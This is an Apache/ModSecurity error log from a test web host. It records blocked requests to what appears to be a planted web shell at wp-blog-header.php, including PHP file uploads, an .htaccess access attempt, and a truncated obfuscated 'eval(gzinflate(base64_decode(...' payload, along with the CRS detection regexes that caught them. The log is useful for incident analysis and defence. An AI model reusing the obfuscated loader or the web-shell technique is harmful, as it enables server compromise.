[Wed Mar 25 08:01:03.822568 2026] [:error] [pid 2927244] [client 101.99.88.90:43276] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: pages.php found within FILES:file: pages.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOILwypuEbDf8eMZyjKKAAAAAU"]
[Wed Mar 25 08:01:03.822767 2026] [:error] [pid 2927244] [client 101.99.88.90:43276] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOILwypuEbDf8eMZyjKKAAAAAU"]
[Wed Mar 25 08:01:03.822989 2026] [:error] [pid 2927244] [client 101.99.88.90:43276] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOILwypuEbDf8eMZyjKKAAAAAU"]
[Wed Mar 25 09:11:09.845814 2026] [:error] [pid 2927213] [client 175.44.9.226:11030] [client 175.44.9.226] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: index.php found within FILES:file: index.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOYnckTZgf62SdRIM5gtgAAAAw"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php
[Wed Mar 25 09:11:09.846227 2026] [:error] [pid 2927213] [client 175.44.9.226:11030] [client 175.44.9.226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOYnckTZgf62SdRIM5gtgAAAAw"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php
[Wed Mar 25 09:11:09.846391 2026] [:error] [pid 2927213] [client 175.44.9.226:11030] [client 175.44.9.226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOYnckTZgf62SdRIM5gtgAAAAw"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php
[Wed Mar 25 09:14:41.694259 2026] [:error] [pid 2927248] [client 23.104.213.5:3502] [client 23.104.213.5] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:src. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "67"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:src: <?php eval(gzinflate(base64_decode(\\x22xz3ljjo7kp1f5abh58ysdwl lqqm1uwnbhr2wiyh omdeetbzgopnmr/vviqkwxgreuq sc//vh7f17/ c9//7//8t/e//n637///hr9r9/z//vp7/f//pn957 dnz7pz3idpfezlop8rhqwsc7sjuvf7fzmr vf18/xuh5er22p63ffz5kz//vm51lqux5e7 vj nv87vr3ate/4/fx766f67p0vy7r6/wn1/xr977mzxz5snj7ppjo8l2r5zs/16exi 7g oqj7ix xp1c/3996qffa6bek59 3dlr87lxipgj8ecrdzjzpkqteth6pvwd/fy65ijlrbze9sp 99oe enxafp3uqnfvel8zv0xlcm/89n/rl9f93p9un7rnbiassmekwbkm57nuj7 ud6ixa8s18/6zver83rxugahfy..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZcfSbycJgiDL1N0t4jAAAAAo"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:14:41.695463 2026] [:error] [pid 2927248] [client 23.104.213.5:3502] [client 23.104.213.5] ModSecurity: Warning. Matched phrase "gzinflate" at ARGS:src. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "296"] [id "933150"] [msg "PHP Injection Attack: High-Risk PHP Function Name Found"] [data "Matched Data: gzinflate found within ARGS:src: <?php eval(gzinflate(base64_decode(\\x22xz3ljjo7kp1f5abh58ysdwl+lqqm1uwnbhr2wiyh+omdeetbzgopnmr/vviqkwxgreuq+sc//vh7f17/+c9//7//8t/e//n637///hr9r9/z//vp7/f//pn957+dnz7pz3idpfezlop8rhqwsc7sjuvf7fzmr+vf18/xuh5er22p63ffz5kz//vm51lqux5e7+vj+nv87vr3ate/4/fx766f67p0vy7r6/wn1/xr977mzxz5snj7ppjo8l2r5zs/16exi+7g+oqj7ix+xp1c/3996qffa6bek59+3dlr87lxipgj8ecrdzjzpkqteth6pvwd/fy65ijlrbze9sp+99oe+enxafp3uqnfvel8zv0xlcm/89n/rl9f93p9un7rnbiassmekwbkm57nuj7+ud6ixa8s18/6zver83r..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZcfSbycJgiDL1N0t4jAAAAAo"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:14:41.695680 2026] [:error] [pid 2927248] [client 23.104.213.5:3502] [client 23.104.213.5] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:src. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: eval(gzinflate(base64_decode(\\x22XZ3LjjO7kp1f5aBH58ySdwl+lQQM1UWNBhr2wIYh+OmdEetbzGoPNmr/VVIqkwxGrEuQ+sc//vH7f17/+c9//7//8T/e//n637///Hr9r9/Z//vP7/f//Pn957+dnz7Pz3idpfezlOP8rHqWsc7Sjuvf7fzMr+vf18/xuH5er22P63ffZ5kz//vM51lquX5e7+vj+nv87vr3ate/4/fX766f67p0vy7R6/Wn1/Xr977MZxz5snj7PPJO8l2r5zs/16eXI+7g+oQj7ix+xp1c/3996qfFa6bek59+3dlR87LxIPGJ8ecRDzjzpkqteth6PVwd/Fy65IjLrbzE9SP+99Oe+enxAfP3uqnfvEL8ZV0XLCM/89N/rl9f93p9UN7rNbIasSMeKwbkM57nuj7+uD6iXa8s18/6zvEr83rXugahFY1t3FYb+ZkxPfHn/tR49a8cy/jwGKQSY5..."] [severity "CRITICAL"] [ver "OWASP [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZcfSbycJgiDL1N0t4jAAAAAo"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:14:41.695852 2026] [:error] [pid 2927248] [client 23.104.213.5:3502] [client 23.104.213.5] ModSecurity: Rule 7fa32f5e6bf8 [id "933210"][file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZcfSbycJgiDL1N0t4jAAAAAo"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:14:41.695994 2026] [:error] [pid 2927248] [client 23.104.213.5:3502] [client 23.104.213.5] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:src. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:src: <?php eval(gzinflate(base64_decode(\\x22XZ3LjjO7kp1f5aBH58ySdwl+lQQM1UWNBhr2wIYh+OmdEetbzGoPNmr/VVIqkwxGrEuQ+sc//vH7f17/+c9//7//8T/e//n637///Hr9r9/Z//vP7/f//Pn957+dnz7Pz3idpfezlOP8rHqWsc7Sjuvf7fzMr+vf18/xuH5er22P63ffZ5kz//vM51lquX5e7+vj+nv87vr3ate/4/fX766f67p0vy7R6/Wn1/Xr977MZxz5snj7PPJO8l2r5zs/16eXI+7g+oQj7ix+xp1c/3996qfFa6bek59+3dlR87LxIPGJ8ecRDzjzpkqteth6PVwd/Fy65IjLrbzE9SP+99Oe+enxAfP3uqnfvEL8ZV0XLCM/89N/rl9f93p9UN7rNbIasSMeKwbkM57nuj7+uD6iXa8s18/6zvEr83rXuga..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rc [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZcfSbycJgiDL1N0t4jAAAAAo"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:14:41.696136 2026] [:error] [pid 2927248] [client 23.104.213.5:3502] [client 23.104.213.5] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:src. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:src: <?php eval(gzinflate(base64_decode(\\x22XZ3LjjO7kp1f5aBH58ySdwl lQQM1UWNBhr2wIYh OmdEetbzGoPNmr/VVIqkwxGrEuQ sc//vH7f17/ c9//7//8T/e//n637///Hr9r9/Z//vP7/f//Pn957 dnz7Pz3idpfezlOP8rHqWsc7Sjuvf7fzMr vf18/xuH5er22P63ffZ5kz//vM51lquX5e7 vj nv87vr3ate/4/fX766f67p0vy7R6/Wn1/Xr977MZxz5snj7PPJO8l2r5zs/16eXI 7g oQj7ix xp1c/3996qfFa6bek59 3dlR87LxIPGJ8ecRDzjzpkqteth6PVwd/Fy65IjLrbzE9SP 99Oe enxAfP3uqnfvEL8ZV0XLCM/89N/rl9f93p9UN7rNbIasSMeKwbkM57nuj7 uD6iXa8s18/6zvEr83rXuga..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rc [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZcfSbycJgiDL1N0t4jAAAAAo"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:14:41.698018 2026] [:error] [pid 2927248] [client 23.104.213.5:3502] [client 23.104.213.5] ModSecurity: Rule 7fa33020f030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZcfSbycJgiDL1N0t4jAAAAAo"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:14:41.699198 2026] [:error] [pid 2927248] [client 23.104.213.5:3502] [client 23.104.213.5] ModSecurity: Rule 7fa3301db3e0 [id "941200"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "334"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZcfSbycJgiDL1N0t4jAAAAAo"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:14:41.700465 2026] [:error] [pid 2927248] [client 23.104.213.5:3502] [client 23.104.213.5] ModSecurity: Rule 7fa330179340 [id "941310"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "625"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZcfSbycJgiDL1N0t4jAAAAAo"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:14:41.700550 2026] [:error] [pid 2927248] [client 23.104.213.5:3502] [client 23.104.213.5] ModSecurity: Rule 7fa33016fc58 [id "941350"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "655"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZcfSbycJgiDL1N0t4jAAAAAo"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:14:41.706242 2026] [:error] [pid 2927248] [client 23.104.213.5:3502] [client 23.104.213.5] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZcfSbycJgiDL1N0t4jAAAAAo"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:14:41.706440 2026] [:error] [pid 2927248] [client 23.104.213.5:3502] [client 23.104.213.5] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=15,HTTP=0,SESS=0): individual paranoia level scores: 25, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZcfSbycJgiDL1N0t4jAAAAAo"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:14:45.782171 2026] [php:warn] [pid 2927248] [client 23.104.213.5:3502] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 103
[Wed Mar 25 09:14:45.782212 2026] [php:warn] [pid 2927248] [client 23.104.213.5:3502] PHP Warning: Undefined array key "path" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 104
[Wed Mar 25 09:14:45.782218 2026] [php:warn] [pid 2927248] [client 23.104.213.5:3502] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 105
[Wed Mar 25 09:14:45.782222 2026] [php:warn] [pid 2927248] [client 23.104.213.5:3502] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 119
[Wed Mar 25 09:14:45.782234 2026] [php:warn] [pid 2927248] [client 23.104.213.5:3502] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 134
[Wed Mar 25 09:14:53.376595 2026] [php:error] [pid 2927248] [client 23.104.213.5:3502] script '/var/www/magento.test.indacotrentino.com/www/pub/index.php' not found or unable to stat, referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:15:10.028630 2026] [:error] [pid 2927221] [client 23.104.213.5:5518] [client 23.104.213.5] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: index.php found within FILES:file: index.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZjX7_KkTPYSQAjCQfPwAAABQ"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:15:10.029156 2026] [:error] [pid 2927221] [client 23.104.213.5:5518] [client 23.104.213.5] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZjX7_KkTPYSQAjCQfPwAAABQ"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:15:10.029314 2026] [:error] [pid 2927221] [client 23.104.213.5:5518] [client 23.104.213.5] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOZjX7_KkTPYSQAjCQfPwAAABQ"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?option&path=/var/www/magento.test.indacotrentino.com/www/pub
[Wed Mar 25 09:15:13.593626 2026] [php:warn] [pid 2927221] [client 23.104.213.5:5518] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 103
[Wed Mar 25 09:15:13.593649 2026] [php:warn] [pid 2927221] [client 23.104.213.5:5518] PHP Warning: Undefined array key "path" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 104
[Wed Mar 25 09:15:13.593654 2026] [php:warn] [pid 2927221] [client 23.104.213.5:5518] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 105
[Wed Mar 25 09:15:13.593658 2026] [php:warn] [pid 2927221] [client 23.104.213.5:5518] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 119
[Wed Mar 25 09:15:13.593662 2026] [php:warn] [pid 2927221] [client 23.104.213.5:5518] PHP Warning: Undefined array key "opt" in /var/www/magento.test.indacotrentino.com/www/pub/wp-blog-header.php on line 134
[Wed Mar 25 09:41:11.883555 2026] [:error] [pid 2927241] [client 23.104.213.5:50316] [client 23.104.213.5] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: index.php found within FILES:file: index.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOfp-O5b7pUQD7n2ABPLgAAAAA"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub/errors
[Wed Mar 25 09:41:11.884081 2026] [:error] [pid 2927241] [client 23.104.213.5:50316] [client 23.104.213.5] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOfp-O5b7pUQD7n2ABPLgAAAAA"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub/errors
[Wed Mar 25 09:41:11.884287 2026] [:error] [pid 2927241] [client 23.104.213.5:50316] [client 23.104.213.5] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOfp-O5b7pUQD7n2ABPLgAAAAA"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub/errors
[Wed Mar 25 09:43:32.299368 2026] [:error] [pid 2927247] [client 23.104.213.5:58940] [client 23.104.213.5] ModSecurity: Warning. Matched phrase ".htaccess" at ARGS:name. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: .htaccess found within ARGS:name: .htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOgNPG1qS8SNEdRzonGjgAAAAk"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub/media
[Wed Mar 25 09:43:32.299420 2026] [:error] [pid 2927247] [client 23.104.213.5:58940] [client 23.104.213.5] ModSecurity: Warning. Matched phrase ".htaccess" at ARGS:path. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: .htaccess found within ARGS:path: /var/www/magento.test.indacotrentino.com/www/pub/media/.htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOgNPG1qS8SNEdRzonGjgAAAAk"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub/media
[Wed Mar 25 09:43:32.300773 2026] [:error] [pid 2927247] [client 23.104.213.5:58940] [client 23.104.213.5] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOgNPG1qS8SNEdRzonGjgAAAAk"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub/media
[Wed Mar 25 09:43:32.301019 2026] [:error] [pid 2927247] [client 23.104.213.5:58940] [client 23.104.213.5] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOgNPG1qS8SNEdRzonGjgAAAAk"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php?path=/var/www/magento.test.indacotrentino.com/www/pub/media
